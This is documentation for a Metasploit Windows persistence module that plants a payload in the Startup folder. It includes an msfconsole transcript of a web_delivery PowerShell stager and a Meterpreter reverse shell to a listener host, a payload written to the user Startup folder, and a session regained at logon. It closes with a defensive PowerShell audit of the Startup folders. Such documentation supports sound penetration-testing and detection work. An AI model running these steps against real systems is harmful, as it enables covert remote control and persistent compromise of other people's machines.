## Vulnerable Application

This module establishes persistence by creating a payload in the user or system startup folder. Works on Vista and newer systems.

## Verification Steps

Example steps (also in the PR):

1. Get a session on the target with admin/system privileges
2. `use exploit/windows/persistence/startup_folder`
3. `set payload `
4. `set lport `
5. `set lhost `
6. `exploit`

## Options

### PAYLOAD_NAME

Name of the payload file to write. Defaults to a random string.

### CONTEXT

Target the current user or all users (system). Defaults to `USER`. `USER` installs only to that user's Startup folder; `SYSTEM` installs to the system-wide Startup folder, which affects all users.

## Scenarios

### Windows 10 1909 (10.0 Build 18363)

Initial Payload

```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4449
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e [encoded command removed]
msf exploit(multi/script/web_delivery) > [*] 2.2.2.2      web_delivery - Powershell command length: 3682
[*] 2.2.2.2      web_delivery - Delivering Payload (3682 bytes)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:50883) at 2025-10-27 15:10:44 -0400

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN10PROLICENSE
OS              : Windows 10 1909 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 1...
```

Persistence

```
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/startup_folder
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/startup_folder) > set session 1
session => 1
msf exploit(windows/persistence/startup_folder) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/startup_folder) > recheck
[*] Reloading module...
[*] The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
msf exploit(windows/persistence/startup_folder) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/startup_folder) > [*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Likely exploitable, able to write test file to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
[+] Writing payload to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zugyndszf.exe
[*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zugyndszf.exe
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251027.1534/WIN10PROLICENSE_20251027.1534.rc
```

Log out and back in as user 'windows'

```
msf exploit(windows/persistence/startup_folder) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50916) at 2025-10-27 15:16:21 -0400

msf exploit(windows/persistence/startup_folder) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: WIN10PROLICENSE\windows
```
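The two folders that `CONTEXT` selects (per-user for `USER`, all-users for `SYSTEM`) are also the places a defender should audit after a run like the one above. The following PowerShell is an added example, not code from the module or from Metasploit; it assumes PowerShell 3 or later, resolves the folders through the .NET `Environment.SpecialFolder` values `Startup` and `CommonStartup`, and flags unsigned executable or script files such as the random-named `.exe` the scenario drops.

```powershell
# Added audit example (not part of the Metasploit module).
# Enumerates both Startup folders the module can write to and reports each
# file with its hash, Authenticode status and creation time, so an unexpected
# unsigned .exe (e.g. a random PAYLOAD_NAME) stands out.
$folders = @{
    USER   = [Environment]::GetFolderPath('Startup')        # CONTEXT=USER
    SYSTEM = [Environment]::GetFolderPath('CommonStartup')  # CONTEXT=SYSTEM
}

# Extensions that execute when the folder is processed at logon.
$runnable = '.exe', '.bat', '.cmd', '.vbs', '.js', '.ps1', '.lnk', '.scr'

$findings = foreach ($ctx in $folders.Keys) {
    $path = $folders[$ctx]
    if (-not (Test-Path -LiteralPath $path)) { continue }
    Get-ChildItem -LiteralPath $path -File -Force | ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [PSCustomObject]@{
            Context    = $ctx
            Path       = $_.FullName
            Created    = $_.CreationTime
            SizeBytes  = $_.Length
            SHA256     = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
            Signature  = $sig.Status
            # Runnable and not validly signed: review before the next logon.
            Suspicious = ($_.Extension.ToLower() -in $runnable) -and ($sig.Status -ne 'Valid')
        }
    }
}

# Suspicious entries first; keep the full list for a baseline comparison.
$findings | Sort-Object Suspicious, Created -Descending | Format-Table -AutoSize
```

Reading the all-users folder does not require elevation, so this can run under a standard account; run it once to establish a baseline and diff later output against it.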